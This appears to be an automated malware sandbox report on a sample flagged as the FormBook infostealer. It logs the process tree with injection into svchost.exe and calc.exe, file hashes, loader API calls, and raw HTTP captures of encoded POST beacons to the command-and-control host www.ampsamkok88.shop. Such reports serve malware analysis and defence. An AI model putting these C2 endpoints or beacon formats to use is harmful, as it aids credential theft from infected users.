76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Jan 10, 2025 19:57:58.813375950 CET	1236	IN	Data Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
Jan 10, 2025 19:57:58.813402891 CET	448	IN	Data Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
Jan 10, 2025 19:57:58.813441038 CET	1236	IN	Data Raw: 30 31 20 2d 34 2e 38 36 31 34 34 34 2c 32 2e 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33 38 20 2d 30 2e 39 31 34 31 Data Ascii: 01 -4.861444,2.68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396 2.209666,
Jan 10, 2025 19:57:58.813466072 CET	1236	IN	Data Raw: 33 2c 36 2e 36 36 37 31 39 20 2d 31 30 2e 37 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33 34 33 32 2c 38 2e 32 34 39 Data Ascii: 3,6.66719 -10.749655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91
Jan 10, 2025 19:57:58.813489914 CET	448	IN	Data Raw: 37 2c 31 39 2e 31 34 35 38 31 20 36 2e 31 39 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e 31 36 36 36 37 20 31 30 2e Data Ascii: 7,19.14581 6.19786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,2
Jan 10, 2025 19:57:58.813513994 CET	1236	IN	Data Raw: 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e Data Ascii: ke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.6665
Jan 10, 2025 19:57:58.813538074 CET	1236	IN	Data Raw: 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e Data Ascii: 021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.00342
Jan 10, 2025 19:57:58.813563108 CET	448	IN	Data Raw: 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 Data Ascii: 00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.232
Jan 10, 2025 19:57:58.813589096 CET	1236	IN	Data Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
Jan 10, 2025 19:57:58.818531990 CET	1236	IN	Data Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.8	50008	3.33.130.190	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:58:03.970964909 CET	717	OUT	POST /d5ko/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.ampsamkok88.shop Origin: http://www.ampsamkok88.shop Content-Length: 208 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Referer: http://www.ampsamkok88.shop/d5ko/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 51 7a 6d 4c 78 6e 38 3d 31 35 36 38 69 4d 7a 31 30 6b 56 77 6b 33 37 69 6c 6e 7a 62 57 30 43 6c 35 7a 6f 4a 31 77 57 79 42 33 53 33 74 5a 30 33 56 4d 30 64 48 4c 47 4b 49 44 4c 51 74 30 33 50 68 4d 42 30 7a 52 41 4e 55 6d 66 62 35 73 6e 34 51 79 58 63 35 67 38 39 74 50 62 61 4d 37 57 33 44 59 51 78 69 6f 67 35 78 6e 36 6c 42 61 35 39 51 67 77 53 54 46 58 57 43 53 56 76 41 5a 36 73 37 44 76 6d 4d 72 73 50 38 6e 44 7a 5a 52 4f 38 65 46 59 52 31 52 31 54 6d 4c 76 73 70 35 56 71 69 44 34 49 44 74 6d 32 77 2b 65 6f 46 52 6b 46 6f 76 49 35 72 61 69 79 43 50 70 6c 47 39 73 79 62 37 61 67 2b 57 43 79 6a 6a 38 63 71 33 73 3d Data Ascii: QzmLxn8=1568iMz10kVwk37ilnzbW0Cl5zoJ1wWyB3S3tZ03VM0dHLGKIDLQt03PhMB0zRANUmfb5sn4QyXc5g89tPbaM7W3DYQxiog5xn6lBa59QgwSTFXWCSVvAZ6s7DvmMrsP8nDzZRO8eFYR1R1TmLvsp5VqiD4IDtm2w+eoFRkFovI5raiyCPplG9syb7ag+WCyjj8cq3s=
Jan 10, 2025 19:58:04.416810989 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.8	50009	3.33.130.190	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:58:06.516493082 CET	737	OUT	POST /d5ko/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.ampsamkok88.shop Origin: http://www.ampsamkok88.shop Content-Length: 228 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Referer: http://www.ampsamkok88.shop/d5ko/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 51 7a 6d 4c 78 6e 38 3d 31 35 36 38 69 4d 7a 31 30 6b 56 77 72 32 4c 69 32 55 72 62 47 6b 43 71 32 54 6f 4a 2f 51 57 75 42 33 65 33 74 64 4e 71 55 2b 41 64 47 72 57 4b 4a 43 4c 51 71 30 33 50 70 73 42 78 35 78 41 4b 55 6d 54 54 35 75 7a 34 51 79 44 63 35 6b 77 39 74 63 44 64 4d 72 57 78 4c 34 51 7a 74 49 67 35 78 6e 36 6c 42 61 73 59 51 67 6f 53 54 55 6e 57 42 7a 56 73 4e 35 36 76 78 6a 76 6d 48 4c 73 4c 38 6e 43 55 5a 55 76 62 65 48 51 52 31 52 46 54 6e 61 76 74 7a 70 56 6f 6d 44 35 34 53 59 37 2b 78 35 65 75 4f 7a 6f 46 72 39 4d 54 6a 4d 54 59 59 74 68 6a 46 39 45 5a 62 34 79 57 37 68 66 61 35 41 73 73 30 67 37 56 6f 67 7a 61 6d 70 76 45 6e 48 32 79 61 56 71 4e 34 4c 59 37 Data Ascii: QzmLxn8=1568iMz10kVwr2Li2UrbGkCq2ToJ/QWuB3e3tdNqU+AdGrWKJCLQq03PpsBx5xAKUmTT5uz4QyDc5kw9tcDdMrWxL4QztIg5xn6lBasYQgoSTUnWBzVsN56vxjvmHLsL8nCUZUvbeHQR1RFTnavtzpVomD54SY7+x5euOzoFr9MTjMTYYthjF9EZb4yW7hfa5Ass0g7VogzampvEnH2yaVqN4LY7
Jan 10, 2025 19:58:06.985340118 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.8	50010	3.33.130.190	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:58:09.063870907 CET	1754	OUT	POST /d5ko/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.ampsamkok88.shop Origin: http://www.ampsamkok88.shop Content-Length: 1244 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Referer: http://www.ampsamkok88.shop/d5ko/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 51 7a 6d 4c 78 6e 38 3d 31 35 36 38 69 4d 7a 31 30 6b 56 77 72 32 4c 69 32 55 72 62 47 6b 43 71 32 54 6f 4a 2f 51 57 75 42 33 65 33 74 64 4e 71 55 2b 34 64 48 59 75 4b 49 68 6a 51 72 30 33 50 6e 4d 42 77 35 78 41 62 55 6c 6a 58 35 75 2b 4e 51 78 37 63 35 48 34 39 36 64 44 64 43 72 57 78 48 59 51 2b 69 6f 67 77 78 6d 57 68 42 61 38 59 51 67 6f 53 54 58 2f 57 56 79 56 73 4c 35 36 73 37 44 76 71 4d 72 73 6a 38 6e 62 72 5a 55 62 68 5a 32 77 52 31 31 68 54 6c 73 37 74 34 70 56 6d 68 44 35 67 53 59 2f 78 78 2f 36 45 4f 79 64 69 72 2f 4d 54 31 70 36 38 66 65 78 65 66 38 51 4e 55 49 47 46 30 47 6a 32 78 68 73 72 30 6e 58 6b 2f 56 44 76 68 49 54 49 79 56 76 6b 44 68 6e 62 39 38 64 76 65 4b 41 6b 42 48 75 4f 55 62 37 67 57 65 2f 63 54 6e 6d 79 5a 46 2f 75 5a 69 57 78 6a 51 7a 4a 61 47 6b 6f 76 4e 38 70 46 69 37 58 32 4a 36 2b 46 6a 31 2b 62 68 79 57 66 6a 36 54 46 31 38 6a 5a 6a 61 6c 47 75 2f 43 53 69 43 6c 78 48 62 66 44 52 61 34 73 52 2b 79 76 56 78 5a 67 65 4b 66 47 62 38 31 37 4d 4c 44 36 57 77 53 36 37 [TRUNCATED] Data Ascii: QzmLxn8=1568iMz10kVwr2Li2UrbGkCq2ToJ/QWuB3e3tdNqU+4dHYuKIhjQr03PnMBw5xAbUljX5u+NQx7c5H496dDdCrWxHYQ+iogwxmWhBa8YQgoSTX/WVyVsL56s7DvqMrsj8nbrZUbhZ2wR11hTls7t4pVmhD5gSY/xx/6EOydir/MT1p68fexef8QNUIGF0Gj2xhsr0nXk/VDvhITIyVvkDhnb98dveKAkBHuOUb7gWe/cTnmyZF/uZiWxjQzJaGkovN8pFi7X2J6+Fj1+bhyWfj6TF18jZjalGu/CSiClxHbfDRa4sR+yvVxZgeKfGb817MLD6WwS67o481YpjUlKXQuj0g62SmaNqbF8udVkZfmxr7OijHU5YHj4ufXVEqA/+9OxRckaZ9NTw7odzkpKET2EmB6yNxgVwBzp0+0YwC9BEBHpe+wPfGwYfzXfEzTkag/0bl8K4o+GGUvfH4GoMSQmFKj2imUoTTBmr7VgHhqPfZBUTPXqrnI02+Co/IiA6dWt8o86rIzYGVOH1yDpxkGUjEkRiBwj6Ib3JO5yNY/rX0wDXw0vyi/GXnn4fRSN4WmUCiPMJPJ/JtQmIBU2kHHNgyHo/rBT4SzuYiN+zs/pjYIFN63aHh2aNw415adbY0TQK5xVutYmqc4Ij1qS6NwCmOw4UE5GRMRpuoHcol+aO/otYNLhO6XstT1uLbJfIlIUIwObpzecJ/0m6evYpToc2Xmb1qncZQB6u5xRITyg3Ie8dl69JlWgUYsI1mHplv8i0vXkuMQozU5DeRvJsZvlbHQScy8sVWU3UFBEVlIMMpU0F8m+O51y58opeOhKKBhKr8GlPy4xXBiLSNuuKaE8O4s+BvvwY0XsAQlp41ru8/vtMB5pqME1NrUpNi8zRVOYGGlcw0vzHtdMtu7tKpAskz77zLgIRF1uLqWbdlxfpJbKBIJ3wTLInjKtdOmXHDzB5saAgBelbUOqoWr7az/uzErgQeCjD3iTHGUqHSpO [TRUNCATED]
Jan 10, 2025 19:58:09.541362047 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.8	50011	3.33.130.190	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:58:11.604494095 CET	447	OUT	GET /d5ko/?QzmLxn8=47Sch4Dsymg0jF3r4GDuCB6kzGYKh0WeL2yhy5BrefofQJ2dMwfirGLwiNRn/0xtXVPtxdeSAw3k3lUcttDNE/CgCPcxlvUG/WK2ZsoqDDwcP3eNWypVGILe8DfKTq90/A==&nbd8Y=hfD0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.ampsamkok88.shop Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Jan 10, 2025 19:58:12.200310946 CET	387	IN	HTTP/1.1 200 OK content-type: text/html date: Fri, 10 Jan 2025 18:58:12 GMT content-length: 266 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 7a 6d 4c 78 6e 38 3d 34 37 53 63 68 34 44 73 79 6d 67 30 6a 46 33 72 34 47 44 75 43 42 36 6b 7a 47 59 4b 68 30 57 65 4c 32 79 68 79 35 42 72 65 66 6f 66 51 4a 32 64 4d 77 66 69 72 47 4c 77 69 4e 52 6e 2f 30 78 74 58 56 50 74 78 64 65 53 41 77 33 6b 33 6c 55 63 74 74 44 4e 45 2f 43 67 43 50 63 78 6c 76 55 47 2f 57 4b 32 5a 73 6f 71 44 44 77 63 50 33 65 4e 57 79 70 56 47 49 4c 65 38 44 66 4b 54 71 39 30 2f 41 3d 3d 26 6e 62 64 38 59 3d 68 66 44 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?QzmLxn8=47Sch4Dsymg0jF3r4GDuCB6kzGYKh0WeL2yhy5BrefofQJ2dMwfirGLwiNRn/0xtXVPtxdeSAw3k3lUcttDNE/CgCPcxlvUG/WK2ZsoqDDwcP3eNWypVGILe8DfKTq90/A==&nbd8Y=hfD0"}</script></head></html>

Target ID:	0
Start time:	13:55:06
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\bkTW1FbgHN.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\bkTW1FbgHN.exe"
Imagebase:	0xf90000
File size:	1'203'712 bytes
MD5 hash:	03058E6963643582D3B8BFCE25D7320F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:55:07
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\bkTW1FbgHN.exe"
Imagebase:	0xea0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1887341354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1887721953.0000000003990000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1888111651.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:55:40
Start date:	10/01/2025
Path:	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe"
Imagebase:	0x8d0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3337603286.0000000002520000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	13:55:42
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\calc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\calc.exe"
Imagebase:	0x520000
File size:	26'112 bytes
MD5 hash:	961E093BE1F666FD38602AD90A5F480F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3337814220.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3337904814.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3335955747.0000000003020000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	13:55:56
Start date:	10/01/2025
Path:	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe"
Imagebase:	0x8d0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3339789975.0000000004A10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	13:56:08
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6d20e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	1.3%
Signature Coverage:	8.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	143

Executed Functions

Function 00F93B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F93B68
IsDebuggerPresent.KERNEL32 ref: 00F93B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,010552F8,010552E0,?,?), ref: 00F93BEB

Part of subcall function 00F97BCC: _memmove.LIBCMT ref: 00F97C06

Part of subcall function 00FA092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00F93C14,010552F8,?,?,?), ref: 00FA096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00F93C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,01047770,00000010), ref: 00FCD281
SetCurrentDirectoryW.KERNEL32(?,010552F8,?,?,?), ref: 00FCD2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,01044260,010552F8,?,?,?), ref: 00FCD33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 00FCD346

Part of subcall function 00F93A46: GetSysColorBrush.USER32(0000000F), ref: 00F93A50
Part of subcall function 00F93A46: LoadCursorW.USER32(00000000,00007F00), ref: 00F93A5F
Part of subcall function 00F93A46: LoadIconW.USER32(00000063), ref: 00F93A76
Part of subcall function 00F93A46: LoadIconW.USER32(000000A4), ref: 00F93A88
Part of subcall function 00F93A46: LoadIconW.USER32(000000A2), ref: 00F93A9A
Part of subcall function 00F93A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F93AC0
Part of subcall function 00F93A46: RegisterClassExW.USER32(?), ref: 00F93B16

Part of subcall function 00F939D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F93A03
Part of subcall function 00F939D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F93A24
Part of subcall function 00F939D5: ShowWindow.USER32(00000000,?,?), ref: 00F93A38
Part of subcall function 00F939D5: ShowWindow.USER32(00000000,?,?), ref: 00F93A41

Part of subcall function 00F9434A: _memset.LIBCMT ref: 00F94370
Part of subcall function 00F9434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F94415

Strings

This is a third-party compiled AutoIt script., xrefs: 00FCD279
runas, xrefs: 00FCD33A

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: a0b27d7f183e07586f7f3e2b946d1ef3ae6019d3781f3dbd3ac3d5f2e498d063
Instruction ID: 2083c1b7871e689e38bc0fa021331ec401bd87f98b18a105d31c6e8160b2778f
Opcode Fuzzy Hash: a0b27d7f183e07586f7f3e2b946d1ef3ae6019d3781f3dbd3ac3d5f2e498d063
Instruction Fuzzy Hash: 8B511771D04309AEEF21EBB4DC06EFE7B78BF46750F004069F491A6142DA7D5645EB21

Function 00F949A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00F949CD

Part of subcall function 00F97BCC: _memmove.LIBCMT ref: 00F97C06

GetCurrentProcess.KERNEL32(?,0101FAEC,00000000,00000000,?), ref: 00F94A9A
IsWow64Process.KERNEL32(00000000), ref: 00F94AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00F94AE7
FreeLibrary.KERNEL32(00000000), ref: 00F94AF2
GetSystemInfo.KERNEL32(00000000), ref: 00F94B23
GetSystemInfo.KERNEL32(00000000), ref: 00F94B2F

Memory Dump Source

